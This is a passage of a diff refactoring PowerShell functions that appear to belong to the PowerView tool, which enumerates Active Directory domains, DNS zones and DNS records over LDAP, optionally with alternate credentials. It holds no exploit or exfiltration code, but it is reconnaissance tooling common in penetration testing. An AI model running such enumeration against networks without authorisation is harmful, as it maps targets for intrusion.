+ $DomainObject = Get-Domain
+ }
+ $TargetDomain = $DomainObject.Name
}
- elseif(-not $DomainController) {
+
+ if (-not $PSBoundParameters['Server']) {
+ # if there's not a specified server to bind to, try to pull the current domain PDC
try {
- # if there's no -DomainController specified, try to pull the primary DC to reflect queries through
- $DomainController = ((Get-NetDomain).PdcRoleOwner).Name
+ if ($DomainObject) {
+ $BindServer = $DomainObject.PdcRoleOwner.Name
+ }
+ elseif ($PSBoundParameters['Credential']) {
+ $BindServer = ((Get-Domain -Credential $Credential).PdcRoleOwner).Name
+ }
+ else {
+ $BindServer = ((Get-Domain).PdcRoleOwner).Name
+ }
}
catch {
- throw "Get-DomainSearcher: Error in retrieving PDC for current domain"
+ throw "[Get-DomainSearcher] Error in retrieving PDC for current domain: $_"
}
}
- }
- elseif (-not $DomainController) {
- # if a DC isn't specified
- try {
- $DomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name
- }
- catch {
- throw "Get-DomainSearcher: Error in retrieving PDC for current domain"
- }
-
- if(!$DomainController) {
- throw "Get-DomainSearcher: Error in retrieving PDC for current domain"
+ else {
+ $BindServer = $Server
}
- }
- $SearchString = "LDAP://"
+ $SearchString = 'LDAP://'
- if($DomainController) {
- $SearchString += $DomainController
- if($Domain){
- $SearchString += '/'
+ if ($BindServer -and ($BindServer.Trim() -ne '')) {
+ $SearchString += $BindServer
+ if ($TargetDomain) {
+ $SearchString += '/'
+ }
}
- }
-
- if($ADSprefix) {
- $SearchString += $ADSprefix + ','
- }
- if($ADSpath) {
- if($ADSpath -Match '^GC://') {
- # if we're searching the global catalog
- $DN = $AdsPath.ToUpper().Trim('/')
- $SearchString = ''
+ if ($PSBoundParameters['SearchBasePrefix']) {
+ $SearchString += $SearchBasePrefix + ','
}
- else {
- if($ADSpath -match '^LDAP://') {
- if($ADSpath -match "LDAP://.+/.+") {
- $SearchString = ''
+
+ if ($PSBoundParameters['SearchBase']) {
+ if ($SearchBase -Match '^GC://') {
+ # if we're searching the global catalog, get the path in the right format
+ $DN = $SearchBase.ToUpper().Trim('/')
+ $SearchString = ''
+ }
+ else {
+ if ($SearchBase -match '^LDAP://') {
+ if ($SearchBase -match "LDAP://.+/.+") {
+ $SearchString = ''
+ $DN = $SearchBase
+ }
+ else {
+ $DN = $SearchBase.SubString(7)
+ }
}
else {
- $ADSpath = $ADSpath.Substring(7)
+ $DN = $SearchBase
}
}
- $DN = $ADSpath
}
- }
- else {
- if($Domain -and ($Domain.Trim() -ne "")) {
- $DN = "DC=$($Domain.Replace('.', ',DC='))"
+ else {
+ # transform the target domain name into a distinguishedName if an ADS search base is not specified
+ if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) {
+ $DN = "DC=$($TargetDomain.Replace('.', ',DC='))"
+ }
}
- }
- $SearchString += $DN
- Write-Verbose "Get-DomainSearcher search string: $SearchString"
+ $SearchString += $DN
+ Write-Verbose "[Get-DomainSearcher] search string: $SearchString"
- if($Credential) {
- Write-Verbose "Using alternate credentials for LDAP connection"
- $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
- $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
- }
- else {
- $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
- }
+ if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
+ Write-Verbose "[Get-DomainSearcher] Using alternate credentials for LDAP connection"
+ # bind to the inital search object using alternate credentials
+ $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+ $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
+ }
+ else {
+ # bind to the inital object using the current credentials
+ $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
+ }
+
+ $Searcher.PageSize = $ResultPageSize
+ $Searcher.SearchScope = $SearchScope
+ $Searcher.CacheResults = $False
+ $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All
+
+ if ($PSBoundParameters['ServerTimeLimit']) {
+ $Searcher.ServerTimeLimit = $ServerTimeLimit
+ }
+
+ if ($PSBoundParameters['Tombstone']) {
+ $Searcher.Tombstone = $True
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ $Searcher.filter = $LDAPFilter
+ }
+
+ if ($PSBoundParameters['SecurityMasks']) {
+ $Searcher.SecurityMasks = Switch ($SecurityMasks) {
+ 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl }
+ 'Group' { [System.DirectoryServices.SecurityMasks]::Group }
+ 'None' { [System.DirectoryServices.SecurityMasks]::None }
+ 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner }
+ 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl }
+ }
+ }
+
+ if ($PSBoundParameters['Properties']) {
+ # handle an array of properties to load w/ the possibility of comma-separated strings
+ $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') }
+ $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad))
+ }
- $Searcher.PageSize = $PageSize
- $Searcher.CacheResults = $False
- $Searcher
+ $Searcher
+ }
}
-filter Convert-DNSRecord {
+function Convert-DNSRecord {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Helpers that decodes a binary DNS record blob.
- Decodes a binary DNS record.
+Author: Michael B. Smith, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
+.DESCRIPTION
- .PARAMETER DNSRecord
+Decodes a binary blob representing an Active Directory DNS entry.
+Used by Get-DomainDNSRecord.
- The domain to query for zones, defaults to the current domain.
+Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
- .LINK
+.PARAMETER DNSRecord
- https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
+A byte array representing the DNS record.
+
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
+
+.LINK
+
+https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
#>
- param(
- [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)]
+
+ [OutputType('System.Management.Automation.PSCustomObject')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Byte[]]
$DNSRecord
)
- function Get-Name {
- # modified decodeName from https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
- [CmdletBinding()]
- param(
- [Byte[]]
- $Raw
- )
+ BEGIN {
+ function Get-Name {
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')]
+ [CmdletBinding()]
+ Param(
+ [Byte[]]
+ $Raw
+ )
- [Int]$Length = $Raw[0]
- [Int]$Segments = $Raw[1]
- [Int]$Index = 2
- [String]$Name = ""
+ [Int]$Length = $Raw[0]
+ [Int]$Segments = $Raw[1]
+ [Int]$Index = 2
+ [String]$Name = ''
- while ($Segments-- -gt 0)
- {
- [Int]$SegmentLength = $Raw[$Index++]
- while ($SegmentLength-- -gt 0) {
- $Name += [Char]$Raw[$Index++]
+ while ($Segments-- -gt 0)
+ {
+ [Int]$SegmentLength = $Raw[$Index++]
+ while ($SegmentLength-- -gt 0) {
+ $Name += [Char]$Raw[$Index++]
+ }
+ $Name += "."
}
- $Name += "."
+ $Name
}
- $Name
}
- $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)
- $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)
- $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)
+ PROCESS {
+ # $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)
+ $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)
+ $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)
- $TTLRaw = $DNSRecord[12..15]
- # reverse for big endian
- $Null = [array]::Reverse($TTLRaw)
- $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)
+ $TTLRaw = $DNSRecord[12..15]
- $Age = [BitConverter]::ToUInt32($DNSRecord, 20)
- if($Age -ne 0) {
- $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()
- }
- else {
- $TimeStamp = "[static]"
- }
+ # reverse for big endian
+ $Null = [array]::Reverse($TTLRaw)
+ $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)
- $DNSRecordObject = New-Object PSObject
+ $Age = [BitConverter]::ToUInt32($DNSRecord, 20)
+ if ($Age -ne 0) {
+ $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()
+ }
+ else {
+ $TimeStamp = '[static]'
+ }
- if($RDataType -eq 1) {
- $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]
- $Data = $IP
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'
- }
+ $DNSRecordObject = New-Object PSObject
- elseif($RDataType -eq 2) {
- $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]
- $Data = $NSName
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'
- }
+ if ($RDataType -eq 1) {
+ $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]
+ $Data = $IP
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'
+ }
- elseif($RDataType -eq 5) {
- $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]
- $Data = $Alias
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'
- }
+ elseif ($RDataType -eq 2) {
+ $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]
+ $Data = $NSName
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'
+ }
- elseif($RDataType -eq 6) {
- # TODO: how to implement properly? nested object?
- $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'
- }
+ elseif ($RDataType -eq 5) {
+ $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]
+ $Data = $Alias
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'
+ }
- elseif($RDataType -eq 12) {
- $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]
- $Data = $Ptr
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'
- }
+ elseif ($RDataType -eq 6) {
+ # TODO: how to implement properly? nested object?
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'
+ }
- elseif($RDataType -eq 13) {
- # TODO: how to implement properly? nested object?
- $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'
- }
+ elseif ($RDataType -eq 12) {
+ $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]
+ $Data = $Ptr
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'
+ }
- elseif($RDataType -eq 15) {
- # TODO: how to implement properly? nested object?
- $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'
- }
+ elseif ($RDataType -eq 13) {
+ # TODO: how to implement properly? nested object?
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'
+ }
- elseif($RDataType -eq 16) {
+ elseif ($RDataType -eq 15) {
+ # TODO: how to implement properly? nested object?
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'
+ }
+
+ elseif ($RDataType -eq 16) {
+ [string]$TXT = ''
+ [int]$SegmentLength = $DNSRecord[24]
+ $Index = 25
- [string]$TXT = ""
- [int]$SegmentLength = $DNSRecord[24]
- $Index = 25
- while ($SegmentLength-- -gt 0) {
- $TXT += [char]$DNSRecord[$index++]
+ while ($SegmentLength-- -gt 0) {
+ $TXT += [char]$DNSRecord[$index++]
+ }
+
+ $Data = $TXT
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'
}
- $Data = $TXT
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'
- }
+ elseif ($RDataType -eq 28) {
+ # TODO: how to implement properly? nested object?
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'
+ }
- elseif($RDataType -eq 28) {
- # TODO: how to implement properly? nested object?
- $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'
- }
+ elseif ($RDataType -eq 33) {
+ # TODO: how to implement properly? nested object?
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'
+ }
- elseif($RDataType -eq 33) {
- # TODO: how to implement properly? nested object?
- $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'
- }
+ else {
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'
+ }
- else {
- $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
- $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'
+ $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial
+ $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL
+ $DNSRecordObject | Add-Member Noteproperty 'Age' $Age
+ $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp
+ $DNSRecordObject | Add-Member Noteproperty 'Data' $Data
+ $DNSRecordObject
}
-
- $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial
- $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL
- $DNSRecordObject | Add-Member Noteproperty 'Age' $Age
- $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp
- $DNSRecordObject | Add-Member Noteproperty 'Data' $Data
- $DNSRecordObject
}
-filter Get-DNSZone {
+function Get-DomainDNSZone {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Enumerates the Active Directory DNS zones for a given domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+.PARAMETER Domain
+
+The domain to query for zones, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to for the search.
- Enumerates the Active Directory DNS zones for a given domain.
+.PARAMETER Properties
- .PARAMETER Domain
+Specifies the properties of the output object to retrieve from the server.
- The domain to query for zones, defaults to the current domain.
+.PARAMETER ResultPageSize
- .PARAMETER DomainController
+Specifies the PageSize to set for the LDAP searcher object.
- Domain controller to reflect LDAP queries through.
+.PARAMETER ServerTimeLimit
- .PARAMETER PageSize
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER FindOne
- .PARAMETER Credential
+Only return one result object.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Credential
- .PARAMETER FullData
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Switch. Return full computer objects instead of just system names (the default).
+.EXAMPLE
- .EXAMPLE
+Get-DomainDNSZone
- PS C:\> Get-DNSZone
+Retrieves the DNS zones for the current domain.
- Retrieves the DNS zones for the current domain.
+.EXAMPLE
- .EXAMPLE
+Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
- PS C:\> Get-DNSZone -Domain dev.testlab.local -DomainController primary.testlab.local
+Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
- Retrieves the DNS zones for the dev.testlab.local domain, reflecting the LDAP queries
- through the primary.testlab.local domain controller.
+.OUTPUTS
+
+PowerView.DNSZone
+
+Outputs custom PSObjects with detailed information about the DNS zone.
#>
- param(
- [Parameter(Position=0, ValueFromPipeline=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.DNSZone')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $DomainController,
+ $Server,
- [ValidateRange(1,10000)]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ResultPageSize = 200,
- [Management.Automation.PSCredential]
- $Credential,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+ [Alias('ReturnOne')]
[Switch]
- $FullData
- )
-
- $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential
- $DNSSearcher.filter="(objectClass=dnsZone)"
+ $FindOne,
- if($DNSSearcher) {
- $Results = $DNSSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- # convert/process the LDAP fields for each result
- $Properties = Convert-LDAPProperty -Properties $_.Properties
- $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- if ($FullData) {
- $Properties
+ PROCESS {
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(objectClass=dnsZone)'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $DNSSearcher1 = Get-DomainSearcher @SearcherArguments
+
+ if ($DNSSearcher1) {
+ if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne() }
+ else { $Results = $DNSSearcher1.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ $Out = Convert-LDAPProperty -Properties $_.Properties
+ $Out | Add-Member NoteProperty 'ZoneName' $Out.name
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')
+ $Out
}
- else {
- $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged
+
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_"
+ }
}
+ $DNSSearcher1.dispose()
}
- $Results.dispose()
- $DNSSearcher.dispose()
- }
- $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "CN=MicrosoftDNS,DC=DomainDnsZones"
- $DNSSearcher.filter="(objectClass=dnsZone)"
+ $SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones'
+ $DNSSearcher2 = Get-DomainSearcher @SearcherArguments
- if($DNSSearcher) {
- $Results = $DNSSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- # convert/process the LDAP fields for each result
- $Properties = Convert-LDAPProperty -Properties $_.Properties
- $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name
-
- if ($FullData) {
- $Properties
+ if ($DNSSearcher2) {
+ try {
+ if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() }
+ else { $Results = $DNSSearcher2.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ $Out = Convert-LDAPProperty -Properties $_.Properties
+ $Out | Add-Member NoteProperty 'ZoneName' $Out.name
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')
+ $Out
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainDNSZone] Error disposing of the Results object: $_"
+ }
+ }
}
- else {
- $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged
+ catch {
+ Write-Verbose "[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'"
}
+ $DNSSearcher2.dispose()
}
- $Results.dispose()
- $DNSSearcher.dispose()
}
}
-filter Get-DNSRecord {
+function Get-DomainDNSRecord {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Enumerates the Active Directory DNS records for a given zone.
- Enumerates the Active Directory DNS records for a given zone.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord
- .PARAMETER ZoneName
+.DESCRIPTION
- The zone to query for records (which can be enumearted with Get-DNSZone). Required.
+Given a specific Active Directory DNS zone name, query for all 'dnsNode'
+LDAP entries using that zone as the search base. Return all DNS entry results
+and use Convert-DNSRecord to try to convert the binary DNS record blobs.
- .PARAMETER Domain
+.PARAMETER ZoneName
- The domain to query for zones, defaults to the current domain.
+Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
- .PARAMETER DomainController
+.PARAMETER Domain
- Domain controller to reflect LDAP queries through.
+The domain to query for zones, defaults to the current domain.
- .PARAMETER PageSize
+.PARAMETER Server
- The PageSize to set for the LDAP searcher object.
+Specifies an Active Directory server (domain controller) to bind to for the search.
- .PARAMETER Credential
+.PARAMETER Properties
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Specifies the properties of the output object to retrieve from the server.
- .EXAMPLE
+.PARAMETER ResultPageSize
- PS C:\> Get-DNSRecord -ZoneName testlab.local
+Specifies the PageSize to set for the LDAP searcher object.
- Retrieve all records for the testlab.local zone.
+.PARAMETER ServerTimeLimit
- .EXAMPLE
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- PS C:\> Get-DNSZone | Get-DNSRecord
+.PARAMETER FindOne
- Retrieve all records for all zones in the current domain.
+Only return one result object.
- .EXAMPLE
+.PARAMETER Credential
- PS C:\> Get-DNSZone -Domain dev.testlab.local | Get-DNSRecord -Domain dev.testlab.local
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Retrieve all records for all zones in the dev.testlab.local domain.
+.EXAMPLE
+
+Get-DomainDNSRecord -ZoneName testlab.local
+
+Retrieve all records for the testlab.local zone.
+
+.EXAMPLE
+
+Get-DomainDNSZone | Get-DomainDNSRecord
+
+Retrieve all records for all zones in the current domain.
+
+.EXAMPLE
+
+Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
+
+Retrieve all records for all zones in the dev.testlab.local domain.
+
+.OUTPUTS
+
+PowerView.DNSRecord
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
#>
- param(
- [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.DNSRecord')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
[String]
$ZoneName,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $DomainController,
+ $Server,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones"
- $DNSSearcher.filter="(objectClass=dnsNode)"
+ PROCESS {
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(objectClass=dnsNode)'
+ 'SearchBasePrefix' = "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones"
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $DNSSearcher = Get-DomainSearcher @SearcherArguments
+
+ if ($DNSSearcher) {
+ if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() }
+ else { $Results = $DNSSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ try {
+ $Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged
+ $Out | Add-Member NoteProperty 'ZoneName' $ZoneName
- if($DNSSearcher) {
- $Results = $DNSSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- try {
- # convert/process the LDAP fields for each result
- $Properties = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged
- $Properties | Add-Member NoteProperty 'ZoneName' $ZoneName
+ # convert the record and extract the properties
+ if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {
+ # TODO: handle multiple nested records properly?
+ $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0]
+ }
+ else {
+ $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord
+ }
- # convert the record and extract the properties
- if ($Properties.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {
- # TODO: handle multiple nested records properly?
- $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord[0]
+ if ($Record) {
+ $Record.PSObject.Properties | ForEach-Object {
+ $Out | Add-Member NoteProperty $_.Name $_.Value
+ }
+ }
+
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord')
+ $Out
}
- else {
- $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord
+ catch {
+ Write-Warning "[Get-DomainDNSRecord] Error: $_"
+ $Out
}
+ }
- if($Record) {
- $Record.psobject.properties | ForEach-Object {
- $Properties | Add-Member NoteProperty $_.Name $_.Value
- }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainDNSRecord] Error disposing of the Results object: $_"
}
-
- $Properties
- }
- catch {
- Write-Warning "ERROR: $_"
- $Properties
}
+ $DNSSearcher.dispose()
}
- $Results.dispose()
- $DNSSearcher.dispose()
}
}
-filter Get-NetDomain {
+function Get-Domain {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns the domain object for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
+domain or the domain specified with -Domain X.
- Returns a given domain object.
+.PARAMETER Domain
- .PARAMETER Domain
+Specifies the domain name to query for, defaults to the current domain.
- The domain name to query for, defaults to the current domain.
+.PARAMETER Credential
- .PARAMETER Credential
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.EXAMPLE
- .EXAMPLE
+Get-Domain -Domain testlab.local
- PS C:\> Get-NetDomain -Domain testlab.local
+.EXAMPLE
- .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Domain -Credential $Cred
- PS C:\> "testlab.local" | Get-NetDomain
+.OUTPUTS
- .LINK
+System.DirectoryServices.ActiveDirectory.Domain
- http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
+A complex .NET domain object.
+
+.LINK
+
+http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
#>
- param(
